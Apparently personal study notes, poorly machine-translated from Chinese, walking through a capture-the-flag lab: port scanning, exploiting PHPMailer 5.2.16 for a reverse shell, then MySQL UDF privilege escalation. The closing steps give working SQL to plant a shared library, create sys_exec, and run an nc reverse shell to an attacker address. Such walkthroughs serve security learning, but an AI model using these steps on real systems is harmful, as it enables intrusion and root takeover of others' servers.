Only take personal study notes

Catalog

One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version detection

Four 、 information gathering

1. Always requesting resources

2. Regular source code

5、 ... and 、 Scan directory

6、 ... and 、phpmailer

7、 ... and 、mysql And udf Raise the right

1. information gathering

2.udf Raise the right

3. step

One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version detection

routine 22,80 port .

111 This is an incomprehensible

42689 Open the remote process call protocol

Four 、 information gathering

1. Always requesting resources

It is the same as the original request for some foreign site resources , As a result, it cannot be loaded normally , Just hang a ladder . If you use burp, Just hang it on two floors .

It's a security company interface

2. Regular source code

Look at the interface , Source code leakage , Is there a hidden directory , None .

5、 ... and 、 Scan directory

The most basic information is wordpress Station building

1. /vendor

3,4,5 All the documents mentioned PHPMailer,readme It's a readme , It introduces phpmailer It's a php Mail transmission class ,. and security He mentioned his historical loopholes .changelog Tell the change log .

Try from phpmailer Make a breakthrough

（1）flag1

6、 ... and 、phpmailer

Because we can know from the above file that the version is 5.2.16, So try these .

1.40974.py

40974.py It can be used . Write bounce to target path shell file .

Be careful ： You need to change the contents of the file before using

（1） Change back to the connection address

（2） Write the backdoor file path

（3） The goal is ip

You can also change the file name

2. Access trigger

3. rebound shell

7、 ... and 、mysql And udf Raise the right

When we collect information , It is found that there is leakage mysql Account and password ,

When checking the process , And found out mysql In order to root It belongs to the main operation , So we can use mysql Right to come ,

1. information gathering

root     [email protected]

2.udf Raise the right

udf The original intention of the design is to facilitate users to customize some functions , It is convenient to query some complex data , At the same time, the use of udf The possibility of raising rights .

An attacker calls... By writing cmd perhaps shell Of udf.dll file , And import it into a specified folder Directory , Create a point to udf.dll The custom function of , Thus, the query in the database is equivalent to cmd perhaps shell Middle execution command .

3. step

（1） find kali Self contained udf Lift the right link library file .so

（2）64.so To the target plane

It's better to put /tmp Next

（3） Check the plug-in path

show variables like '%plugin%';

（4） Write to the database through the link library file

Using the system database , Create a table , Write link library file data .

use mysql;

create table a(line blob);

insert into a values(load_file('/tmp/x.so'));

（5） Then write the link library file to the plug-in location

select * from a into dumpfile '/usr/lib/mysql/plugin/x.so';

（6） Create a new function

create function sys_exec returns integer soname 'x.so';

 （7） Execute bounce shell

select sys_exec('nc 192.168.0.107 6666 -e /bin/bash');